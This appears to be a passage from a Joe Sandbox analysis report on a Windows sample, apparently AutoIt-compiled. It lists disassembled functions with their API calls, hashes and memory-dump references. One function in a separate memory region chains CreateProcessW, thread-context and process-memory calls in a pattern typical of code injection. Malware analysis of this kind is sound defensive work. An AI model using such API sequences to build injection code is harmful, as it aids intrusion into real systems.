                                            • Instruction Fuzzy Hash: 6D914C71910219AFCF04EFA8CC919EEB7B4FF18314B148429F516EB295DB34EA44DB52
                                            Function 00804A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00805374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008C1148,?,008061FF,?,00000000,00000001,00000000), ref: 00805392
                                              • Part of subcall function 008049FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00804A1D
                                            • _wcscat.LIBCMT ref: 00872D80
                                            • _wcscat.LIBCMT ref: 00872DB5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscat$FileModuleNameOpen
                                            • String ID: \$\Include\
                                            • API String ID: 3592542968-2640467822
                                            • Opcode ID: c9f0f26f1ccbe5aa708b1922b264be5beae6289612e02532b705507aeb2e1195
                                            • Instruction ID: e5d1cea7913f47e41ed549c3c65059a2b88e70e569b3c800567e16993df89765
                                            • Opcode Fuzzy Hash: c9f0f26f1ccbe5aa708b1922b264be5beae6289612e02532b705507aeb2e1195
                                            • Instruction Fuzzy Hash: 8A5159B14043449FC754EF59EC9289AB7F8FB59310B48452FF649C32E1EB70AA48CB52
                                            Function 008234AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • __getstream.LIBCMT ref: 008234FE
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 00823539
                                            • __wopenfile.LIBCMT ref: 00823549
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                            • String ID: <G
                                            • API String ID: 1820251861-2138716496
                                            • Opcode ID: 94ac6a9c41b4be41fcafe77ac0331141344cab20787579279f5037453f0cee7c
                                            • Instruction ID: 9d014b8bea622ef9e996cd5c149182855e462f921cefd8b8af059b98d6ef6f92
                                            • Opcode Fuzzy Hash: 94ac6a9c41b4be41fcafe77ac0331141344cab20787579279f5037453f0cee7c
                                            • Instruction Fuzzy Hash: 93110D70A002359FDB11BF79BC4266E36E4FF05350B148965E815D7281FB38CAD19762
                                            Function 0081D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0081D28B,SwapMouseButtons,00000004,?), ref: 0081D2BC
                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0081D28B,SwapMouseButtons,00000004,?,?,?,?,0081C865), ref: 0081D2DD
                                            • RegCloseKey.KERNELBASE(00000000,?,?,0081D28B,SwapMouseButtons,00000004,?,?,?,?,0081C865), ref: 0081D2FF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue
                                            • String ID: Control Panel\Mouse
                                            • API String ID: 3677997916-824357125
                                            • Opcode ID: 414301eb4af7a26bdcdbccb18013644e3829c89974b3156d6b3c44f405e4752a
                                            • Instruction ID: 05b331b80eba0ef06f32643c3dcad6767d1f78b502cfacb10822b99588b7f5dc
                                            • Opcode Fuzzy Hash: 414301eb4af7a26bdcdbccb18013644e3829c89974b3156d6b3c44f405e4752a
                                            • Instruction Fuzzy Hash: 28112375611308FFDB218FA8CC84EEF7BBCFF44754B104869A815D7250E631AE81AB60
                                            Function 011B1DC0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 011B257B
                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011B2611
                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011B2633
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1483155707.00000000011B0000.00000040.00000020.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_11b0000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                            • String ID:
                                            • API String ID: 2438371351-0
                                            • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                            • Instruction ID: 79d4411f6b0b9909eb1fc8c01c192d57950a407e7e15f4f78c1c9f2e84925fe9
                                            • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                            • Instruction Fuzzy Hash: 71620D30A14658DBEB28CFA4C890BDEB772EF58300F1091A9D10DEB394E7759E85CB59
                                            Function 0084C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00804517: _fseek.LIBCMT ref: 0080452F
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C65D
                                              • Part of subcall function 0084C56D: _wcscmp.LIBCMT ref: 0084C670
                                            • _free.LIBCMT ref: 0084C4DD
                                            • _free.LIBCMT ref: 0084C4E4
                                            • _free.LIBCMT ref: 0084C54F
                                              • Part of subcall function 00821C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00827A85), ref: 00821CB1
                                              • Part of subcall function 00821C9D: GetLastError.KERNEL32(00000000,?,00827A85), ref: 00821CC3
                                            • _free.LIBCMT ref: 0084C557
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                            • String ID:
                                            • API String ID: 1552873950-0
                                            • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                            • Instruction ID: 91c0fb465342a4069c0e737c223797702de9d638140a0248b39b6722a39102ec
                                            • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                                            • Instruction Fuzzy Hash: 09514CB5905218AFDF549F68DC81AADBBB9FF48304F1000AEB259E3291DB715A80CF59
                                            Function 0081EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0081EBB2
                                              • Part of subcall function 008051AF: _memset.LIBCMT ref: 0080522F
                                              • Part of subcall function 008051AF: _wcscpy.LIBCMT ref: 00805283
                                              • Part of subcall function 008051AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00805293
                                            • KillTimer.USER32(?,00000001,?,?), ref: 0081EC07
                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0081EC16
                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00873C88
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                            • String ID:
                                            • API String ID: 1378193009-0
                                            • Opcode ID: 0e9166361df8dd1d047207e7bd07fcc3ea66feda58df47a01a71dd69225847f8
                                            • Instruction ID: 2fd20304bd2e9edb2b85bd9c32deb2f22da51e3814f70d633d64125a021139f7
                                            • Opcode Fuzzy Hash: 0e9166361df8dd1d047207e7bd07fcc3ea66feda58df47a01a71dd69225847f8
                                            • Instruction Fuzzy Hash: EB21B3705047949FE7339B288C59BE6BBECFF51308F04048DE68EA6186C3746A848B52
                                            Function 008040E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00873725
                                            • GetOpenFileNameW.COMDLG32 ref: 0087376F
                                              • Part of subcall function 0080660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008053B1,?,?,008061FF,?,00000000,00000001,00000000), ref: 0080662F
                                              • Part of subcall function 008040A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008040C6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Name$Path$FileFullLongOpen_memset
                                            • String ID: X
                                            • API String ID: 3777226403-3081909835
                                            • Opcode ID: 069e5c08fea832e964710ac4f387d55aaa547307e1967e138aa3068c5fcb20ec
                                            • Instruction ID: 4b6bfa3d8ad5bc806264f7b8ab4e5fef56260ff0412470b27a702d2eeb0cd4a2
                                            • Opcode Fuzzy Hash: 069e5c08fea832e964710ac4f387d55aaa547307e1967e138aa3068c5fcb20ec
                                            • Instruction Fuzzy Hash: E62184B1A102589BDB419FD8DC45BDE7BF8FF49304F004069E505E7281DBB49A898F66
                                            Function 0084C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathW.KERNEL32(00000104,?), ref: 0084C72F
                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0084C746
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Temp$FileNamePath
                                            • String ID: aut
                                            • API String ID: 3285503233-3010740371
                                            • Opcode ID: cf2f1b8fef5f8779ea92dbc7a373230b7b7fe8d867cf03c0dd1ed1c5f1d2fd3c
                                            • Instruction ID: b342f3d4b1a05964ae1ef05bdae82437760f51e0d8f5722ac7764972021d8de3
                                            • Opcode Fuzzy Hash: cf2f1b8fef5f8779ea92dbc7a373230b7b7fe8d867cf03c0dd1ed1c5f1d2fd3c
                                            • Instruction Fuzzy Hash: A7D05E7250030EBBDB10AB94DC0EFCA7B6CA700704F0001A07650E51F1DBB4E6998B54
                                            Function 0085F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d477eb8d9d742e3e6c8205e710248059828511d8ec202319d998f416de0d9937
                                            • Instruction ID: 79074c3a26835740542d465050757bef425fe540f498ceca761a84f4bc89534f
                                            • Opcode Fuzzy Hash: d477eb8d9d742e3e6c8205e710248059828511d8ec202319d998f416de0d9937
                                            • Instruction Fuzzy Hash: 9AF149716043059FC710DF28C885B5AB7E5FF88315F14892EFA99DB292DB70E949CB82
                                            Function 00804FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00805022
                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008050CB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: IconNotifyShell__memset
                                            • String ID:
                                            • API String ID: 928536360-0
                                            • Opcode ID: a4ccedf962fe6e446f3fb5b408f6d46823752f543fda91b8dab27c1fd5547229
                                            • Instruction ID: a98b39b8684b994295324bba4c64954fc6d7291483deaf9375e2cd9318a5d21c
                                            • Opcode Fuzzy Hash: a4ccedf962fe6e446f3fb5b408f6d46823752f543fda91b8dab27c1fd5547229
                                            • Instruction Fuzzy Hash: 6A3152B1505B01CFD761DF28D88569BBBF4FF49304F00092EE59AC6291D7716944CFA6
                                            Function 0082395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __FF_MSGBANNER.LIBCMT ref: 00823973
                                              • Part of subcall function 008281C2: __NMSG_WRITE.LIBCMT ref: 008281E9
                                              • Part of subcall function 008281C2: __NMSG_WRITE.LIBCMT ref: 008281F3
                                            • __NMSG_WRITE.LIBCMT ref: 0082397A
                                              • Part of subcall function 0082821F: GetModuleFileNameW.KERNEL32(00000000,008C0312,00000104,00000000,00000001,00000000), ref: 008282B1
                                              • Part of subcall function 0082821F: ___crtMessageBoxW.LIBCMT ref: 0082835F
                                              • Part of subcall function 00821145: ___crtCorExitProcess.LIBCMT ref: 0082114B
                                              • Part of subcall function 00821145: ExitProcess.KERNEL32 ref: 00821154
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            • RtlAllocateHeap.NTDLL(00F20000,00000000,00000001,00000001,00000000,?,?,0081F507,?,0000000E), ref: 0082399F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                            • String ID:
                                            • API String ID: 1372826849-0
                                            • Opcode ID: 4e6fb2799233a3c188da5b76b2b454ba7cc7fb8311eae0bb110376ac286d0e4d
                                            • Instruction ID: fe8c599f7cb4ba200519b7935f4af88bd429f16f8a110c57cd98b93346bb5595
                                            • Opcode Fuzzy Hash: 4e6fb2799233a3c188da5b76b2b454ba7cc7fb8311eae0bb110376ac286d0e4d
                                            • Instruction Fuzzy Hash: 1A019635245635DAEA113B39FC66B2A3B98FB83764F210026F505D6182DBB89DC086A5
                                            Function 0084C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0084C385,?,?,?,?,?,00000004), ref: 0084C6F2
                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0084C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0084C708
                                            • CloseHandle.KERNEL32(00000000,?,0084C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0084C70F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandleTime
                                            • String ID:
                                            • API String ID: 3397143404-0
                                            • Opcode ID: dfc536047d8b20e2113bc767f7fd085dc0b812d472b04e6994b89678b209365d
                                            • Instruction ID: 137b9afec76813fe286760b9564cbe4169671de40603d2c46aec3f9ab5c99e3d
                                            • Opcode Fuzzy Hash: dfc536047d8b20e2113bc767f7fd085dc0b812d472b04e6994b89678b209365d
                                            • Instruction Fuzzy Hash: 53E08636141314B7D7212B58AC0DFCA7B18FF05770F104110FB14691E097B129118798
                                            Function 00802322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 008022A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008024F1), ref: 00802303
                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008025A1
                                            • CoInitialize.OLE32(00000000), ref: 00802618
                                            • CloseHandle.KERNEL32(00000000), ref: 0087503A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Handle$CloseInitializeMessageRegisterWindow
                                            • String ID:
                                            • API String ID: 3815369404-0
                                            • Opcode ID: 7b4fc726185490762ea724be5233d590cf87769ac5726f1a039e331fde386baf
                                            • Instruction ID: b2d0b58f70e9b07ff606b128cc350196e16a1aa7b7861a652a336701fe479c55
                                            • Opcode Fuzzy Hash: 7b4fc726185490762ea724be5233d590cf87769ac5726f1a039e331fde386baf
                                            • Instruction Fuzzy Hash: E071BCB89012818ACB44EFAAADDCD95BBB5FB9B344790422ED109C77A3CB748414CF09
                                            Function 00803A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                            Download Yara Rule
                                            APIs
                                            • IsThemeActive.UXTHEME ref: 00803A73
                                              • Part of subcall function 00821405: __lock.LIBCMT ref: 0082140B
                                              • Part of subcall function 00803ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00803AF3
                                              • Part of subcall function 00803ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00803B08
                                              • Part of subcall function 00803D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00803AA3,?), ref: 00803D45
                                              • Part of subcall function 00803D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00803AA3,?), ref: 00803D57
                                              • Part of subcall function 00803D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,008C1148,008C1130,?,?,?,?,00803AA3,?), ref: 00803DC8
                                              • Part of subcall function 00803D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00803AA3,?), ref: 00803E48
                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00803AB3
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                            • String ID:
                                            • API String ID: 924797094-0
                                            • Opcode ID: f2354c8f86f7a85a939b5cf59d70f316b207e67879be71acedb1ab9da3f93bb9
                                            • Instruction ID: c50c33a23aed6dae60a1a48931d5473ec2c6478dd7360d564d76a58f9839c9ac
                                            • Opcode Fuzzy Hash: f2354c8f86f7a85a939b5cf59d70f316b207e67879be71acedb1ab9da3f93bb9
                                            • Instruction Fuzzy Hash: 09116771A083519FCB00EF69EC4990ABBF9FF95710F00891EF589C72A2DB7095948B92
                                            Function 0082E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • ___lock_fhandle.LIBCMT ref: 0082EA29
                                            • __close_nolock.LIBCMT ref: 0082EA42
                                              • Part of subcall function 00827BDA: __getptd_noexit.LIBCMT ref: 00827BDA
                                              • Part of subcall function 00827C0E: __getptd_noexit.LIBCMT ref: 00827C0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                            • String ID:
                                            • API String ID: 1046115767-0
                                            • Opcode ID: d8a9e8e4880c1c32676cbd922b7a69d608e6dbc0f4af84f6b3335a3c8d48bd91
                                            • Instruction ID: b5ede6769d6bab61e44790d37aff3def5e2df48514d48ccdab036a26e2317e8d
                                            • Opcode Fuzzy Hash: d8a9e8e4880c1c32676cbd922b7a69d608e6dbc0f4af84f6b3335a3c8d48bd91
                                            • Instruction Fuzzy Hash: 2E1173728156749BD711BB6CB84175C7AA1FF51335F264340E426DF1E2D7B488C086AA
                                            Function 0081F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0082395C: __FF_MSGBANNER.LIBCMT ref: 00823973
                                              • Part of subcall function 0082395C: __NMSG_WRITE.LIBCMT ref: 0082397A
                                              • Part of subcall function 0082395C: RtlAllocateHeap.NTDLL(00F20000,00000000,00000001,00000001,00000000,?,?,0081F507,?,0000000E), ref: 0082399F
                                            • std::exception::exception.LIBCMT ref: 0081F51E
                                            • __CxxThrowException@8.LIBCMT ref: 0081F533
                                              • Part of subcall function 00826805: RaiseException.KERNEL32(?,?,0000000E,008B6A30,?,?,?,0081F538,0000000E,008B6A30,?,00000001), ref: 00826856
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
